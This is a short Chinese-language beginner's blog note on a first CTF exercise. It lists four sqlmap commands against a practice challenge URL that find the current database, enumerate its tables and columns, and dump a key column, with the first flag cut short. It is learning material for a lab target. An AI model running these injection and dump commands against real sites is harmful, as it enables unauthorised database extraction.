sqlmap初学
第一次接触ctf,跟着上边的初学视频简单的实践了一下,在学习上,我向来是习惯先看到一个小demo的成果,然后在一点点去深入了解,下边就是简单的示例操作了。
**python sqlmap.py -u "ctf5.shiyanbar.com/8/index.php?id=1" --current-d**

python sqlmap.py -u “ctf5.shiyanbar.com/8/index.php?id=1” -D my_db --tables
python sqlmap.py -u “ctf5.shiyanbar.com/8/index.php?id=1” -D my_db -T thiskey --columns
python sqlmap.py -u “ctf5.shiyanbar.com/8/index.php?id=1” -D my_db -T thiskey -C k0y --dump